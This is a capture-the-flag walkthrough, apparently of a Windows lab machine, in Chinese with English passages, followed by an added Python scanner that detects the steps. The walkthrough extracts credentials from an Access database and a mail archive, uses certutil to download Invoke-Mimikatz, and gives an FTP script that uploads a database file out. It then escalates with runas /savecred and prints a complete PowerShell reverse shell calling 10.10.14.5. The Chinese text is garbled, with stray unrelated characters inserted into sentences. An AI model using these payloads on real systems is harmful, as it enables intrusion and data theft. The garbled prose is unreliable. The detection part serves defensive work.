(Screenshot: FTP server)
2. In the Kali environment the mdb-tools suite can be used to read .mdb files; for example, mdb-export backup.mdb <table> dumps one table. Here Python is used to export every table in the database.
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import os

# Base command: mdb-export dumps one table of the Access database as CSV
cmd = 'mdb-export backup.mdb '
table = 'acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx'
item_list = table.split(' ')

# The output directory must exist before the files are written
os.makedirs('backupdb', exist_ok=True)

for item in item_list:
    print(item)
    c_cmd = cmd + item
    # Run mdb-export for this table and capture its CSV output
    process = os.popen(c_cmd)
    output = process.read()
    process.close()
    # Write one file per table under backupdb/
    table_file = open('backupdb/' + item, 'w')
    table_file.write(output)
    table_file.close()
導(dǎo)出后的數(shù)據(jù)文件形式
3.在auth_user表中可以發(fā)現(xiàn)一組有用的用戶名密碼:engineer access4u@security
auth_user表
4.利用這個(gè)密碼可以去解密剛下載的壓縮包,壓縮包里是一個(gè).pst郵件格式文件轿衔,如果安裝了outlook可以很容易的打開(kāi)沉迹,如果沒(méi)有可以在kali中安裝evolution和evolution-plugins,readpst "Access Control.pst" 轉(zhuǎn)換pst為mbox文件害驹,mail -f "Access Control" 查看mbox文件鞭呕。在郵件中保存有另一組登錄帳號(hào):security 4Cc3ssC0ntr0ller,這組賬號(hào)可供telnet登錄使用裙秋。
郵件內(nèi)容
5.telnet登錄后在security的桌面拿下user.txt
telnet登錄
6.繼續(xù)滲透會(huì)發(fā)現(xiàn)服務(wù)器禁止了.exe程序的執(zhí)行琅拌,只能執(zhí)行部分系統(tǒng)指令,powershell是唯一可能的突破口摘刑,但同樣對(duì)運(yùn)行權(quán)限做了限制进宝,常用的Set-ExecutionPolicy Unrestricted限制繞過(guò)等指令都需要管理員權(quán)限。在當(dāng)前環(huán)境中可以用以下命令進(jìn)行上傳枷恕,下載党晋。下載功能是系統(tǒng)自帶,上傳需要用到ps1腳本徐块,在kali中我搭建了ftp用于接收文件未玻,雖然對(duì)本題并不能拿到線索,但也留個(gè)備份胡控,以后可能用到扳剿。
Built-in Windows download command: certutil -urlcache -split -f http://10.10.14.5/Invoke-Mimikatz.ps1
Running a script as a normal user: powershell -ExecutionPolicy ByPass -File new.ps1
# FTP upload script (PS1) follows #
$ftp="ftp://10.10.14.5"      # FTP server set up on the Kali box
$user="root"
$pass="123456"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
$name="Access.mdb"           # name the file will be stored under on the FTP server
$uri = New-Object System.Uri($ftp+"/"+$name)
$webclient.UploadFile($uri,"C:/ZKTeco/ZKAccess3.5/Access.mdb")   # upload the local file
7. The key to privilege escalation is the Runas command: runas has a /savecred parameter that runs a command with the user's saved credentials. So start an nc listener locally and fire the one-liner runas /user:administrator /savecred "powershell -ExecutionPolicy ByPass -File C:\Users\Public\new.ps1", where new.ps1 is a PowerShell reverse shell.
(Screenshot: runas parameters)
# new.ps1 reverse shell script follows #
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
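Every step above leaves a process-creation trail on the host: certutil fetching a URL, powershell launched with -ExecutionPolicy ByPass, and runas with /savecred. The following Python scanner is an added example, not part of the original writeup; it runs a small rule set over constructed process-creation records (format timestamp|user|command line, which is an assumption, as are the rule names and regexes) and also flags the download-then-execute chain for a single user.

```python
#!/usr/bin/env python3
"""Flag process-creation command lines that match the living-off-the-land
patterns used in this walkthrough (example detection code, not a vendor rule set)."""
import re
from typing import Dict, List

# Rule name -> case-insensitive regex over the raw command line.
# The names and patterns are assumptions written for this example.
RULES: Dict[str, "re.Pattern"] = {
    # certutil used as a downloader: -urlcache together with a URL
    "certutil_url_download": re.compile(
        r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I),
    # powershell started with the execution policy bypassed
    "powershell_execpolicy_bypass": re.compile(
        r"\bpowershell(\.exe)?\b.*-(ExecutionPolicy|ep)\s+bypass\b", re.I),
    # runas replaying stored credentials
    "runas_savecred": re.compile(r"\brunas(\.exe)?\b.*/savecred\b", re.I),
    # powershell opening a raw TCP socket from the command line
    "powershell_tcpclient": re.compile(
        r"\bpowershell\b.*System\.Net\.Sockets\.TCPClient", re.I),
}

# Constructed sample records: timestamp|user|command line (not real telemetry)
SAMPLE_LOG = """\
2024-01-01T10:00:01Z|ACCESS\\security|C:\\Windows\\System32\\cmd.exe /c whoami
2024-01-01T10:00:05Z|ACCESS\\security|certutil -urlcache -split -f http://10.10.14.5/new.ps1
2024-01-01T10:00:09Z|ACCESS\\security|powershell -ExecutionPolicy ByPass -File new.ps1
2024-01-01T10:00:20Z|ACCESS\\security|runas /user:administrator /savecred "powershell -ExecutionPolicy ByPass -File C:\\Users\\Public\\new.ps1"
2024-01-01T10:01:00Z|ACCESS\\Administrator|C:\\Windows\\System32\\notepad.exe
"""


def match_rules(cmdline: str) -> List[str]:
    """Return the names of every rule whose regex matches the command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse the records and return one hit per line that matched at least one rule.

    The command line is the last field, so only the first two '|' are split on;
    a '|' inside the command line (e.g. a PowerShell pipeline) is preserved."""
    hits: List[Dict[str, object]] = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ts, user, cmdline = raw.split("|", 2)
        names = match_rules(cmdline)
        if names:
            hits.append({"time": ts, "user": user, "rules": names, "cmdline": cmdline})
    return hits


def download_then_execute(hits: List[Dict[str, object]]) -> List[str]:
    """Users whose certutil download was later followed by a policy-bypass launch.

    Hits are assumed to be in log order, so a simple per-user state is enough."""
    seen_download = set()
    flagged: List[str] = []
    for h in hits:
        if "certutil_url_download" in h["rules"]:
            seen_download.add(h["user"])
        elif "powershell_execpolicy_bypass" in h["rules"] and h["user"] in seen_download:
            if h["user"] not in flagged:
                flagged.append(h["user"])
    return flagged


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["user"], ",".join(h["rules"]), "::", h["cmdline"])
    print("download-then-execute chains:", download_then_execute(found))
```

The rules are deliberately narrow (a URL must accompany -urlcache, the bypass must be an explicit argument) to keep false positives low; the chain check adds context that a single-event rule lacks, since a policy bypass on its own is common in administration scripts.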
8.最后在Administrator的桌面目錄中拿下root.txtroot.txt